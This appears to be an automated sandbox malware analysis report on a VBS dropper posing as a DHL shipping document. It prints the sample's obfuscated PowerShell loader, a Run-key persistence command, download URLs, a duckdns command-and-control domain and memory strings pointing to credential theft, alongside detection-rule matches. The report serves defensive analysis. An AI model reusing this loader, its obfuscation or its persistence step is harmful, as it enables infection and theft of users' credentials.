$Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", ProcessId: 6924, ProcessName: cmd.exe
Source: Registry Key set; Author: frack113, Florian Roth (Nextron Systems); Data: Details: %Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7284, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gstes
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs", CommandLine|base64offset|contains: J), Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs", ProcessId: 7448, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opd
              No Snort rule has matched



              AV Detection

Source: Yara match; File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown; HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:60918 version: TLS 1.2
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1844677982.0000000002D05000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb>b source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_22B210F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B26580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,10_2_22B26580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040AE51 FindFirstFileW,FindNextFileW,19_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,21_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407898

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              Source: unknownDNS query: name: janbours92harbu02.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.9:60919 -> 206.123.148.194:3981
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewIP Address: 206.123.148.194 206.123.148.194
              Source: Joe Sandbox ViewASN Name: M247GB M247GB
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /Nedslagnings.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /zPwwF47.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /Nedslagnings.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /zPwwF47.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: wab.exe, 00000013.00000003.2021151072.0000000003989000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 00000013.00000003.2021151072.0000000003989000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: bhvB999.tmp.19.drString found in binary or memory: exp1.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhvB999.tmp.19.drString found in binary or memory: exp2.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhvB999.tmp.19.drString found in binary or memory: exp3.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhvB999.tmp.19.drString found in binary or memory: exp4.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhvB999.tmp.19.drString found in binary or memory: exp5.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: bhvB999.tmp.19.drString found in binary or memory: realtime.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhvB999.tmp.19.drString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhvB999.tmp.19.drString found in binary or memory: www.linkedin.com0 equals www.linkedin.com (Linkedin)
              Source: wab.exe, 0000000A.00000002.2264740043.0000000023370000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000002.2264740043.0000000023370000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: contemega.com.do
              Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
              Source: global trafficDNS traffic detected: DNS query: janbours92harbu02.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: bhvB999.tmp.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhvB999.tmp.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhvB999.tmp.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
              Source: bhvB999.tmp.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: powershell.exe, 00000002.00000002.1943692775.000001379AA8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://contemega.com.do
              Source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: powershell.exe, 00000002.00000002.2065998160.00000137B12D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
              Source: powershell.exe, 00000002.00000002.2047294756.00000137A8D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhvB999.tmp.19.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhvB999.tmp.19.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhvB999.tmp.19.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhvB999.tmp.19.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://ocsp.msocsp.com0S
              Source: powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1943692775.0000013798CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.0000000004881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: bhvB999.tmp.19.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 00000016.00000002.1996776338.000000000334D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 00000016.00000002.1996776338.000000000334D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.coma
              Source: wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 00000013.00000002.2021961381.0000000003293000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhvB999.tmp.19.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DesusertionEndpoint=P
              Source: bhvB999.tmp.19.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhvB999.tmp.19.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhvB999.tmp.19.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhvB999.tmp.19.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhvB999.tmp.19.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: powershell.exe, 00000002.00000002.1943692775.0000013798CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.1845384623.0000000004881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: bhvB999.tmp.19.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhvB999.tmp.19.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
              Source: bhvB999.tmp.19.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: powershell.exe, 00000002.00000002.1943692775.000001379AA2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.Pb)m
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.c
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.co
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.d
              Source: powershell.exe, 00000002.00000002.1943692775.0000013798ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.000001379AA2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/N
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Ne
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Ned
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Neds
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedsl
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedsla
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslag
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagn
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagni
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagnin
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagning
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagnings
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagnings.
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagnings.d
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagnings.dw
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagnings.dwp
              Source: wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/zPwwF47.bin
              Source: wab.exe, 0000000A.00000002.2261933839.0000000022470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/zPwwF47.binOptjsLanmoviesmacktalk.com/zPwwF47.bin
              Source: powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: bhvB999.tmp.19.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhvB999.tmp.19.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhvB999.tmp.19.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5b&
              Source: bhvB999.tmp.19.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5c&
              Source: bhvB999.tmp.19.drString found in binary or memory: https://edd27623571fc427dc1f8d6ba04dd39f.clo.footprintdns.com/apc/trans.gif?b37f6b94dfddf29d58d90046
              Source: bhvB999.tmp.19.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: bhvB999.tmp.19.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhvB999.tmp.19.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: bhvB999.tmp.19.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: wab.exe, 00000013.00000003.2001386225.000000000398B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhvB999.tmp.19.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhvB999.tmp.19.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
              Source: bhvB999.tmp.19.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhvB999.tmp.19.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.c
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.co
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/N
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Ne
